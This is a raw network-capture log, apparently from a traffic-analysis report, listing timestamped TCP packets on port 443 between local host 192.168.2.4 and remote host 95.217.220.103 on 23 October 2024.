                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.311124086 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.311403990 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.312186003 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.312203884 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.312284946 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.312294006 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.312638044 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.409635067 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.409661055 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.409763098 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.409786940 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.409840107 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.429955006 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.429996967 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.430042028 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.430064917 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.430083036 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.430114031 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.509510040 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.509532928 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.509639025 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.509668112 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.509722948 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.545564890 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.545583010 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.545676947 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.545701027 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.545751095 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.549173117 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.549204111 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.549251080 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.549259901 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.549325943 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.549352884 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.647622108 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.647697926 CEST4434978295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:05.647840023 CEST49782443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:08.993333101 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:08.993360996 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:08.993485928 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:08.993499994 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:08.993544102 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.006689072 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.006715059 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.006866932 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.006887913 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.006932020 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.111355066 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.111381054 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.111558914 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.111587048 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.111639023 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.124461889 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.124489069 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.124600887 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.124628067 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.124675989 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.239624023 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.239653111 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.239837885 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.239861012 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.239907980 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.240900993 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.240920067 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.240983009 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.240992069 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.241028070 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.356895924 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.356929064 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.357105970 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.357141972 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.357186079 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.358027935 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.358047962 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.358098030 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.358109951 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.358135939 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.358151913 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.473795891 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.473820925 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.473871946 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.473925114 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.473937988 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.473982096 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.475047112 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.475068092 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.475116014 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.475128889 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.475152969 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.475167036 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.579461098 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.579487085 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.579668999 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.579698086 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.579751015 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.591897011 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.591922045 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.592047930 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.592067957 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.592119932 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.674390078 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.674421072 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.674591064 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.674607992 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.674660921 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.708276033 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.708309889 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.708456039 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.708503962 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.708507061 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.708569050 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.709489107 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.709507942 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.709587097 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.709597111 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.709645033 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.824779034 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.824807882 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.824951887 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.824985027 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.825043917 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.826508999 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.826524019 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.826626062 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.826633930 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.826678991 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.908034086 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.908063889 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.908109903 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.908188105 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.908258915 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.908294916 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.909281015 CEST49808443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:09.909308910 CEST4434980895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:10.198080063 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.333153009 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.335433960 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.410501003 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.410541058 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.410686016 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.410706043 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.411148071 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.452254057 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.452299118 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.452358007 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.452373981 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.452408075 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.452430964 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.529472113 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.529504061 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.529654026 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.529680014 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.530039072 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.570976973 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.571016073 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.571064949 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.571109056 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.571126938 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.571147919 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.648291111 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.648325920 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.648469925 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.648524046 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.648865938 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.689841986 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.689874887 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.690010071 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.690048933 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.690372944 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.713548899 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.713655949 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.713661909 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.713970900 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.713982105 CEST4434983395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.714014053 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.714046001 CEST49833443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.976252079 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.976294041 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.976531029 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.976753950 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:13.976763964 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:14.862809896 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:14.862987995 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:14.863598108 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:14.863610983 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:14.865725040 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:14.865731001 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.413120031 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.413145065 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.413161039 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.413304090 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.413333893 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.413347960 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.413378000 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.415860891 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.415890932 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.415985107 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.415992022 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.416018009 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.416024923 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.522310972 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.522340059 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.522449017 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.522476912 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.522521019 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.641452074 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.641483068 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.641700983 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.641733885 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.641820908 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.760426998 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.760457993 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.760590076 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.760629892 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.760684013 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.884787083 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.884825945 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.885030985 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.885057926 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.885128021 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.998361111 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.998389006 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.998477936 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.998511076 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.998524904 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:15.998553038 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:16.013276100 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:16.013304949 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:16.013397932 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:16.013410091 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:16.013448000 CEST49857443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:16.132004023 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:16.132030964 CEST4434985795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.132503986 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.132529974 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.132793903 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.132841110 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.133275032 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.211507082 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.211540937 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.211597919 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.211618900 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.211633921 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.211719990 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.311675072 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.311702013 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.311902046 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.311918974 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.311963081 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.402007103 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.402034998 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.402148962 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.402167082 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.402250051 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.493433952 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.493470907 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.493578911 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.493594885 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.493639946 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.600528002 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.600553989 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.600605011 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.600615025 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.600665092 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.663157940 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.663187027 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.663240910 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.663269997 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.663290024 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.663309097 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.753942013 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.753976107 CEST4434988695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.754026890 CEST49886443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:21.754045963 CEST4434988695.217.220.103192.168.2.4
